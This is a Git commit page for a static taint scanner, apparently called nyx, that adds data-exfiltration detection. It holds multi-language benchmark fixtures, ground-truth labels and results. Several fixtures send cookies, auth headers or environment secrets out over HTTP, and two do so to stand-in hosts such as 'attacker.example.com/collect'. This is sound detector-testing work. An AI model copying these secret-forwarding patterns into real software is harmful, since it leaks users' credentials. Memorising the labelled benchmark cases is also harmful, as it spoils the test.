apunkt/nyx
1
0
Fork 0
mirror of https://github.com/elicpeter/nyx.git synced 2026-06-15 20:05:13 +02:00
Code Issues Projects Releases Packages Wiki Activity

Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

Browse source 
* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions
Download patch file Download diff file Expand all files Collapse all files

17
tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c Normal file
View file

@ -0,0 +1,17 @@
// DATA_EXFIL: env-config (Sensitive source) flows into the gated
// curl_easy_setopt sink at the CURLOPT_POSTFIELDS activation. The
// destination URL is set by a separate CURLOPT_URL setopt above; only
// the body-binding setopt fires DATA_EXFIL.
#include <curl/curl.h>
#include <stdlib.h>
void leak_env(void) {
char *token = getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

16
tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c Normal file
View file

@ -0,0 +1,16 @@
// DATA_EXFIL safe: plain user input via fgets/stdin forwarded into the
// CURLOPT_POSTFIELDS body of a fixed-URL curl request must not fire.
// Sensitivity-gate strips the cap for Plain-tier sources.
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin(void) {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

14
tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go Normal file
View file

@ -0,0 +1,14 @@
// DATA_EXFIL: a session cookie (Sensitive source) flows into the body
// of http.Post() at a hardcoded destination URL.
package fixture
import (
"net/http"
"strings"
)
func leakCookie(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
http.Post("https://analytics.internal/track", "text/plain", body)
}

15
tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go Normal file
View file

@ -0,0 +1,15 @@
// DATA_EXFIL safe: plain attacker-controlled user input forwarded to a
// fixed-destination http.Post body must not fire. Sensitivity-gate
// strips the cap because the source is Plain-tier user input.
package fixture
import (
"net/http"
"strings"
)
func forwardUserInput(r *http.Request) {
msg := r.FormValue("msg")
body := strings.NewReader(msg)
http.Post("https://analytics.internal/track", "text/plain", body)
}

23
tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java Normal file
View file

@ -0,0 +1,23 @@
// DATA_EXFIL: a Sensitive cookie source flows through
// BodyPublishers.ofString() into the request builder chain and finally
// into client.send() at a hardcoded destination URL.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
public class DataExfilJdkHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue();
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create("https://analytics.internal/track"))
.POST(BodyPublishers.ofString(session))
.build();
client.send(req, BodyHandlers.ofString());
}
}

24
tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java Normal file
View file

@ -0,0 +1,24 @@
// DATA_EXFIL: an OkHttp two-step where a session attribute (Sensitive
// source) is wrapped via RequestBody.create and bound to a request
// targeting a hardcoded URL. The chain-normalized newCall.execute
// matcher fires DATA_EXFIL on the body bind.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class DataExfilOkHttp {
public void leak(HttpSession session) throws Exception {
String token = (String) session.getAttribute("csrfToken");
OkHttpClient client = new OkHttpClient();
RequestBody body = RequestBody.create(
token, MediaType.parse("text/plain"));
Request req = new Request.Builder()
.url("https://analytics.internal/track")
.post(body)
.build();
Response resp = client.newCall(req).execute();
}
}

10
tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js Normal file
View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a fixed destination. SSRF must NOT fire
// because the URL is a hardcoded literal.
function leakBody(req) {
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

10
tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js Normal file
View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at an attacker-controlled host. SSRF stays
// silent (URL is a static literal); DATA_EXFIL fires.
function leakBodyExternal(req) {
var payload = req.cookies.session;
fetch('https://untrusted.example.com/intake', {
method: 'POST',
body: payload,
});
}

9
tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js Normal file
View file

@ -0,0 +1,9 @@
// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
// body of XMLHttpRequest.send(). The destination is a static literal, so
// SSRF must not fire.
function leakHeader(req) {
var auth = req.headers.authorization;
var xhr = new XMLHttpRequest();
xhr.open('POST', '/upstream');
xhr.send(auth);
}

8
tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js Normal file
View file

@ -0,0 +1,8 @@
// DATA_EXFIL safe: routing a Sensitive cookie source through the named
// telemetry boundary `logEvent` is the developer's explicit decision to
// forward; the default Sanitizer(data_exfil) convention strips the cap.
function track(req) {
logEvent({
user: req.cookies.session,
});
}

10
tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js Normal file
View file

@ -0,0 +1,10 @@
// DATA_EXFIL safe: plain user input echoed into a fetch() body must not
// fire. The user already controls req.body.message; surfacing it back
// into the outbound payload is not a cross-boundary disclosure.
function forwardUserMessage(req) {
var message = req.body.message;
fetch('/forward', {
method: 'POST',
body: message,
});
}

17
tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py Normal file
View file

@ -0,0 +1,17 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# DATA_EXFIL: env-config secret flows into the json kwarg of an async
# httpx.AsyncClient().post() at a fixed destination URL.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')
await httpx.AsyncClient().post(
'https://upstream.internal/ingest',
json={'api_key': api_key},
)
return {'ok': True}

16
tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py Normal file
View file

@ -0,0 +1,16 @@
import os
import requests
from flask import Flask
app = Flask(__name__)
# DATA_EXFIL: env-config secrets accumulate into a dict, then flow as the
# json kwarg of requests.post() at a fixed destination URL.
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
payload['region'] = os.environ.get('UPSTREAM_REGION')
requests.post('https://api.internal/ingest', json=payload)
return 'ok'

14
tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py Normal file
View file

@ -0,0 +1,14 @@
import requests
from flask import Flask, request
app = Flask(__name__)
# DATA_EXFIL safe: plain user input echoed into a fixed-destination
# requests.post body must not fire. Sensitivity-gate strips the cap
# because the source is Plain-tier (raw user input).
@app.route('/forward', methods=['POST'])
def forward():
message = request.form.get('message')
requests.post('https://telemetry.internal/forward', json={'message': message})
return 'ok'

10
tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb Normal file
View file

@ -0,0 +1,10 @@
require 'net/http'
require 'uri'
# DATA_EXFIL: a session cookie (Sensitive source) flows into the body
# of Net::HTTP.post at a fixed destination URL.
def forward_session(request)
sid = request.cookies[:auth_token]
uri = URI('https://analytics.internal/track')
Net::HTTP.post(uri, "session=#{sid}")
end

12
tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb Normal file
View file

@ -0,0 +1,12 @@
require 'rest-client'
# DATA_EXFIL safe: plain user input echoed into a RestClient.post body
# at a fixed destination URL must not fire. Sensitivity-gate strips the
# cap for Plain-tier sources.
def forward_message(params)
message = params[:message]
RestClient.post(
'https://telemetry.internal/forward',
{ message: message }.to_json
)
end

10
tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs Normal file
View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config (Sensitive source) flows into reqwest's .form()
// chain at a fixed destination URL. The form-encoded payload leaks the
// operator-bound secret across the outbound boundary.
fn exfil_form() {
let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.form(&secret)
.send();
}

10
tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts Normal file
View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a fixed destination. SSRF must NOT fire
// because the URL is a hardcoded literal.
function leakBody(req: { cookies: { session: string } }): void {
const payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

10
tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts Normal file
View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
// body of fetch() via the body field of the init object. Destination is
// a static literal so SSRF must not fire.
function leakHeader(req: { headers: { authorization: string } }): void {
const auth = req.headers.authorization;
fetch('https://analytics.internal/track', {
method: 'POST',
body: auth,
});
}

572
tests/benchmark/ground_truth.json
View file

@ -3,7 +3,7 @@
"metadata": {
"description": "Nyx benchmark ground truth",
"created": "2026-03-20",
"corpus_size": 458
"corpus_size": 477
},
"cases": [
{
@ -14474,6 +14474,576 @@
],
"disabled": false,
"notes": "Vulnerable counterpart to py-auth-realrepo-005: same FastAPI route shape but no `dependencies=[Depends(...)]` keyword arg. Regression guard: the dependency-injection recogniser must not blanket-suppress every FastAPI route."
},
{
"case_id": "js-data_exfil-001",
"file": "javascript/data_exfil/exfil_fetch_cookie_body.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie"
],
"disabled": false,
"notes": "Cookie source flows into fetch body at hardcoded URL; DATA_EXFIL must fire and SSRF must not."
},
{
"case_id": "js-data_exfil-002",
"file": "javascript/data_exfil/exfil_fetch_external_destination.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie",
"external-destination"
],
"disabled": false,
"notes": "Cookie source flows into fetch body at attacker-controlled host; DATA_EXFIL fires, SSRF does not."
},
{
"case_id": "js-data_exfil-003",
"file": "javascript/data_exfil/exfil_xhr_send_header.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[8, 8]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"xhr",
"header"
],
"disabled": false,
"notes": "Authorization header source flows into XMLHttpRequest.send body at hardcoded URL."
},
{
"case_id": "ts-data_exfil-001",
"file": "typescript/data_exfil/exfil_fetch_cookie_body.ts",
"language": "typescript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie"
],
"disabled": false,
"notes": "TypeScript variant of js-data_exfil-001."
},
{
"case_id": "ts-data_exfil-002",
"file": "typescript/data_exfil/exfil_fetch_header_body.ts",
"language": "typescript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"header"
],
"disabled": false,
"notes": "Authorization header flows into fetch body at hardcoded URL."
},
{
"case_id": "py-data_exfil-001",
"file": "python/data_exfil/exfil_requests_post_env_dict.py",
"language": "python",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[14, 14]
],
"expected_source_lines": [
[12, 13]
],
"tags": [
"data_exfil",
"requests",
"env",
"container"
],
"disabled": false,
"notes": "Env-config secrets accumulate into a dict, then flow as the json kwarg of requests.post; container-taint round-trip."
},
{
"case_id": "py-data_exfil-002",
"file": "python/data_exfil/exfil_httpx_async_post_env.py",
"language": "python",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[12, 15]
],
"expected_source_lines": [
[11, 11]
],
"tags": [
"data_exfil",
"httpx",
"async",
"env"
],
"disabled": false,
"notes": "Env-config secret flows into httpx.AsyncClient().post json kwarg via the type-qualified HttpClient.post matcher."
},
{
"case_id": "java-data_exfil-001",
"file": "java/data_exfil/DataExfilJdkHttpClient.java",
"language": "java",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[16, 20]
],
"expected_source_lines": [
[13, 14]
],
"tags": [
"data_exfil",
"jdk-httpclient",
"cookie"
],
"disabled": false,
"notes": "Servlet cookie value flows through BodyPublishers.ofString into HttpClient.send body."
},
{
"case_id": "java-data_exfil-002",
"file": "java/data_exfil/DataExfilOkHttp.java",
"language": "java",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[15, 21]
],
"expected_source_lines": [
[13, 13]
],
"tags": [
"data_exfil",
"okhttp",
"session"
],
"disabled": false,
"notes": "HttpSession attribute wraps via RequestBody.create and binds to OkHttp Request.Builder.post; chain-normalized newCall.execute fires DATA_EXFIL."
},
{
"case_id": "go-data_exfil-001",
"file": "go/data_exfil/exfil_http_post_cookie_body.go",
"language": "go",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[12, 12]
],
"expected_source_lines": [
[10, 11]
],
"tags": [
"data_exfil",
"http-post",
"cookie"
],
"disabled": false,
"notes": "Cookie value flows via strings.NewReader into http.Post body at hardcoded URL."
},
{
"case_id": "rs-data_exfil-001",
"file": "rust/data_exfil/exfil_reqwest_form_env.rs",
"language": "rust",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[5, 8]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"reqwest",
"form",
"env"
],
"disabled": false,
"notes": "env::var secret flows into reqwest .form() body chain via the form.send body-bind matcher."
},
{
"case_id": "rb-data_exfil-001",
"file": "ruby/data_exfil/exfil_net_http_post_cookie.rb",
"language": "ruby",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[9, 9]
],
"expected_source_lines": [
[7, 7]
],
"tags": [
"data_exfil",
"net-http",
"cookie"
],
"disabled": false,
"notes": "request.cookies value flows into Net::HTTP.post body at hardcoded URL."
},
{
"case_id": "c-data_exfil-001",
"file": "c/data_exfil/exfil_curl_postfields_env.c",
"language": "c",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[14, 14]
],
"expected_source_lines": [
[9, 9]
],
"tags": [
"data_exfil",
"curl",
"gated-sink",
"env"
],
"disabled": false,
"notes": "getenv secret flows into curl_easy_setopt CURLOPT_POSTFIELDS body; gated-sink fires only at the body-binding setopt."
},
{
"case_id": "js-safe-data_exfil-001",
"file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js",
"language": "javascript",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"sanitizer-wrap"
],
"disabled": false,
"notes": "Cookie source routed through default forwarding-wrapper sanitizer (logEvent); DATA_EXFIL must not fire."
},
{
"case_id": "js-safe-data_exfil-002",
"file": "javascript/safe/safe_data_exfil_user_input_echo.js",
"language": "javascript",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "Plain user input echoed into fetch body at fixed URL; sensitivity-gate suppresses Plain-tier sources for Cap::DATA_EXFIL."
},
{
"case_id": "py-safe-data_exfil-001",
"file": "python/safe/safe_data_exfil_user_input_echo.py",
"language": "python",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "Flask form-field echoed into requests.post json at fixed URL; sensitivity-gate suppresses Plain-tier user input."
},
{
"case_id": "go-safe-data_exfil-001",
"file": "go/safe/safe_data_exfil_user_input_echo.go",
"language": "go",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "FormValue plain user input echoed into http.Post body at fixed URL; sensitivity-gate suppresses Plain-tier sources."
},
{
"case_id": "rb-safe-data_exfil-001",
"file": "ruby/safe/safe_data_exfil_user_input_echo.rb",
"language": "ruby",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "params plain user input echoed into RestClient.post body at fixed URL; sensitivity-gate suppresses Plain-tier sources."
},
{
"case_id": "c-safe-data_exfil-001",
"file": "c/safe/safe_data_exfil_user_input_echo.c",
"language": "c",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "fgets stdin user input echoed into curl_easy_setopt CURLOPT_POSTFIELDS at fixed URL; sensitivity-gate suppresses Plain-tier sources."
}
]
}

606
tests/benchmark/results/latest.json
View file

@ -1,6 +1,6 @@
{
"benchmark_version": "1.0",
"timestamp": "2026-04-29T21:50:34Z",
"timestamp": "2026-04-30T23:44:32Z",
"scanner_version": "0.5.0",
"scanner_config": {
"analysis_mode": "Full",
@ -9,9 +9,9 @@
"state_analysis_enabled": true,
"worker_threads": 1
},
"ground_truth_hash": "sha256:5b391d654f88673e5a200af875d513cf83812af747739395e8315768b8983ce3",
"corpus_size": 458,
"cases_run": 457,
"ground_truth_hash": "sha256:228d1577d9560cfa08521e783ec513509363470455743a43a4102df713af1849",
"corpus_size": 477,
"cases_run": 476,
"cases_skipped": 1,
"outcomes": [
{
@ -181,6 +181,25 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "c-data_exfil-001",
"file": "c/data_exfil/exfil_curl_postfields_env.c",
"language": "c",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 9:19)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 9:19)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "c-fmt-001",
"file": "c/fmt_string/fmt_printf.c",
@ -455,6 +474,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "c-safe-data_exfil-001",
"file": "c/safe/safe_data_exfil_user_input_echo.c",
"language": "c",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "c-ssrf-001",
"file": "c/ssrf/ssrf_curl.c",
@ -1685,11 +1719,14 @@
"matched_rule_ids": [
"rb.deser.yaml_load"
],
"unexpected_rule_ids": [],
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink",
"rb.deser.yaml_load"
],
"security_finding_count": 1,
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
@ -2066,6 +2103,25 @@
"security_finding_count": 3,
"non_security_finding_count": 0
},
{
"case_id": "go-data_exfil-001",
"file": "go/data_exfil/exfil_http_post_cookie_body.go",
"language": "go",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 11:10)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 11:10)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "go-fmt_string-001",
"file": "go/fmt_string/fmt_injection.go",
@ -2453,6 +2509,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "go-safe-data_exfil-001",
"file": "go/safe/safe_data_exfil_user_input_echo.go",
"language": "go",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "go-safe-fieldproj-phase3",
"file": "go/safe/safe_chained_receiver_field_proj.go",
@ -2660,15 +2731,13 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 8:9)",
"taint-unsanitised-flow (source 8:9)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 8:9)",
"taint-unsanitised-flow (source 8:9)"
],
"security_finding_count": 2,
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -2840,6 +2909,44 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "java-data_exfil-001",
"file": "java/data_exfil/DataExfilJdkHttpClient.java",
"language": "java",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:28)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:28)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "java-data_exfil-002",
"file": "java/data_exfil/DataExfilOkHttp.java",
"language": "java",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:33)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:33)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "java-deser-001",
"file": "java/deser/DeserOis.java",
@ -3005,13 +3112,17 @@
"language": "java",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
